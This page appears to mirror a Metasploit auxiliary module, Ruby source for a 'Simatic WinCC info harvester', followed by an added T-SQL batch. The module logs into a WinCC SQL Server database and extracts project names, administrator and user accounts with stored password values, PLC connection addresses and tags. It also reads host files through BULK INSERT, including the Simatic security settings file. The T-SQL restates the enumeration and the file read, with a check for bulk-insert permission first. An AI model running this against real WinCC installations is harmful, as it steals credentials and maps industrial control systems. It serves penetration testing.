Simatic WinCC Information Harvester
Source: metasploit.com  Author: Nagibin  Published: 2013-01-23
# encoding: UTF-8
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary
	include Msf::Exploit::Remote::MSSQL

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Simatic WinCC info harvester',
			'Description'    => %q{
				This module receives sensitive information from the WinCC database:
				project name, administrator and user accounts with their stored
				password values, groups, PLC connections and tags. If the MSSQL
				login can use BULK INSERT, it also reads files from the WinCC host.
			},
			'Author'         =>
				[
					'Dmitry Nagibin', # research
					'Gleb Gritsai <ggritsai@ptsecurity.ru>', # research
					'Vyacheslav Egoshin <vegoshin@ptsecurity.ru>', # metasploit module
				],
			'License'        => MSF_LICENSE,
			'References'     =>
				[
					[ 'URL', 'http://www.ptsecurity.com' ]
				],
			'Version'        => '$Revision$',
			'DisclosureDate' => 'Jun 3 2012'
		))

		register_options(
			[
				OptString.new('DOCUMENTS_FOLDER_NAME', [true, "Documents folder name", 'Documents']),
			], self.class)
	end

	def run
		unless mssql_login_datastore # connect with the credentials from the datastore
			print_error "Can't connect to the database"
			return
		end

		# WinCC project databases: name starts with CC and ends in a digit
		project_databases_names = q("SELECT name FROM master..sysdatabases WHERE name LIKE 'CC%_[0-9]'")
		if project_databases_names.nil? or project_databases_names.empty?
			print_error "No WinCC project databases found"
			return
		end
		get_info project_databases_names
	end

	# Run a query; return its rows (or the whole result hash), nil on a reported error
	def q query, show_errors = true, verbose = false, only_rows = true
		result = mssql_query(query, verbose)
		if !result[:errors].empty? and show_errors
			print_error "Error: #{result[:errors]}"
			print_error "Error query: #{query}"
			nil
		else
			only_rows ? result[:rows] : result
		end
	end

	def get_info dbs
		prj = {}
		dbs.each do |db|
			db = db.first # each row is [name]; get db name
			prj[db] = {} # init hash
			prj[db]["name"]   = q("SELECT DSN FROM #{db}.dbo.CC_CsSysInfoLog")
			# the module treats GRPID 1000 as the administrator group; PASS is converted to varbinary so it prints as hex
			prj[db]["admins"] = q("SELECT NAME, convert(varbinary, PASS) as PWD from #{db}.dbo.PW_USER WHERE PASS <> '' and GRPID = 1000")
			prj[db]["users"]  = q("SELECT ID, NAME, convert(varbinary, PASS), GRPID FROM #{db}.[dbo].[PW_USER] WHERE PASS <> '' and GRPID <> 1000")
			prj[db]["groups"] = q("SELECT ID, NAME FROM #{db}.[dbo].[PW_USER] WHERE PASS = ''")
			prj[db]["plcs"]   = q("SELECT CONNECTIONNAME, PARAMETER FROM #{db}.[dbo].[MCPTCONNECTION]")
			prj[db]["tags"]   = q("SELECT VARNAME,VARTYP,COMMENTS FROM #{db}.[dbo].[PDE#TAGs]")

			# PARAMETER holds the connection string; keep just the PLC IP when one is present
			prj[db]["plcs"] = (prj[db]["plcs"] || []).map do |name, param|
				ip = param.to_s[/\d+\.\d+\.\d+\.\d+/] # first dotted quad, or nil
				[name, ip || param]
			end

			name_rows = prj[db]["name"]
			project = (name_rows && name_rows.first) ? name_rows.first.first : db
			print_good "Project: #{project}\n" # print project name

			# Table data
			print_table %w|ID NAME|, prj[db]["groups"], "WinCC groups"
			print_table %w|Name Password(hex)|, prj[db]["admins"], "WinCC administrator"
			print_table %w|ID NAME Password(hex) GRPID|, prj[db]["users"], "WinCC users"
			print_table %w|VARNAME VARTYP COMMENTS|, prj[db]["tags"], "WinCC tags"
			print_table %w|CONNECTIONNAME PARAMETER|, prj[db]["plcs"], "WinCC PLCs"

			# Check file access through batched queries. BULK INSERT needs the bulkadmin or
			# sysadmin role (or ADMINISTER BULK OPERATIONS), and the file is opened with the
			# SQL Server service account's permissions, not the client's.
			if can_read_file? db
				settings = read_file get_value("Security settings path"), db
				if settings
					# save results to file
					File.open("/tmp/security_settings.xml", "w+") do |f|
						f.puts settings
					end
				end
			end
			print_line
		end
	end

	def print_table columns, rows, header = ''
		tbl = Rex::Ui::Text::Table.new(
			'Indent'  => 4,
			'Header'  => header,
			'Columns' => columns
		)
		unless rows.nil?
			rows.each do |r|
				tbl << r # add rows
			end
			print_line tbl.to_s
		end
	end

	# Read a file through batched queries: BULK INSERT loads it line by line into a
	# scratch table that is dropped afterwards. Returns the rows, or nil on failure.
	# (db is unused: the scratch table is created in the login's default database.)
	def read_file file_name, db
		q("CREATE TABLE mydata (line varchar(8000));", false)
		q("BULK INSERT mydata FROM '#{file_name}';", false)
		result = q("select * from mydata", false)
		q("DROP TABLE mydata;", false)
		print_error("Can't read file: #{file_name}") if result.nil?
		result
	end

	# Check whether the account can read files, probing a file present on every Windows host
	def can_read_file? db
		res = read_file get_value("test"), db
		return false if res.nil? # query failed; calling .size on nil would raise
		print_status "Access read files! (#{get_value "test"} read)"
		res.size > 0 # return true or false
	end

	def get_value i
		config = {
			# DOCUMENTS_FOLDER_NAME lets the localised name of the Documents folder be supplied
			"Security settings path" => "C:\\Documents and Settings\\All Users\\#{datastore['DOCUMENTS_FOLDER_NAME']}\\SimaticSecurityControl\\setRules.xml",
			"test" => %q|C:\Windows\win.ini|
		}
		config[i]
	end
end
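The database enumeration and the BULK INSERT file read that the module performs through its q() helper, collected into one T-SQL batch as an added example. This is not the module's code and not part of the original page. It assumes SQL Server 2008 or later (DECLARE with an initialiser, TRY/CATCH) and uses the same probe file the module uses, C:\Windows\win.ini. It adds the check the module does not make before attempting the read: BULK INSERT requires the sysadmin or bulkadmin server role, or the ADMINISTER BULK OPERATIONS permission, and the file is opened by the SQL Server service account, so a failure here is about the server's rights, not the client's.

```sql
-- 1. Enumerate WinCC project databases (the module's own pattern).
--    In a T-SQL LIKE pattern "_" is a single-character wildcard, so this
--    matches names that start with CC, followed by anything, one more
--    character, and a trailing digit.
SELECT name FROM master..sysdatabases WHERE name LIKE 'CC%_[0-9]';

-- 2. Can the current login use BULK INSERT at all?
--    1 in any of the last three columns means the read in step 3 is allowed
--    by SQL Server (the service account must still be able to open the file).
SELECT
    SUSER_SNAME()                                               AS login_name,
    IS_SRVROLEMEMBER('sysadmin')                                AS is_sysadmin,
    IS_SRVROLEMEMBER('bulkadmin')                               AS is_bulkadmin,
    HAS_PERMS_BY_NAME(NULL, NULL, 'ADMINISTER BULK OPERATIONS') AS can_bulk;

-- 3. Read a file into a session-scoped temp table and always drop it,
--    even when BULK INSERT fails. The module creates a permanent dbo.mydata
--    table instead; a #temp table is invisible to other sessions and vanishes
--    with the connection if the client dies mid-way.
DECLARE @path nvarchar(260) = N'C:\Windows\win.ini';   -- probe file, as in the module
DECLARE @sql  nvarchar(max);

CREATE TABLE #mydata (line varchar(8000));
BEGIN TRY
    -- BULK INSERT does not take a variable as the file name, so the statement
    -- is built as a string; doubling any quote in @path keeps it a single literal.
    SET @sql = N'BULK INSERT #mydata FROM ''' + REPLACE(@path, '''', '''''') + N''';';
    EXEC sp_executesql @sql;
    SELECT line FROM #mydata;
END TRY
BEGIN CATCH
    -- typical failures: no bulk permission, or the service account cannot open the file
    SELECT ERROR_NUMBER() AS err, ERROR_MESSAGE() AS msg;
END CATCH;
DROP TABLE #mydata;
```

The temp table created in the outer batch is visible inside sp_executesql because dynamic SQL runs in the same session, which is why the INSERT target can be #mydata. Run step 2 on its own first when assessing a WinCC host: if it returns all zeros, the file read cannot succeed and there is no reason to leave the attempt in the server's error log.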
 
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved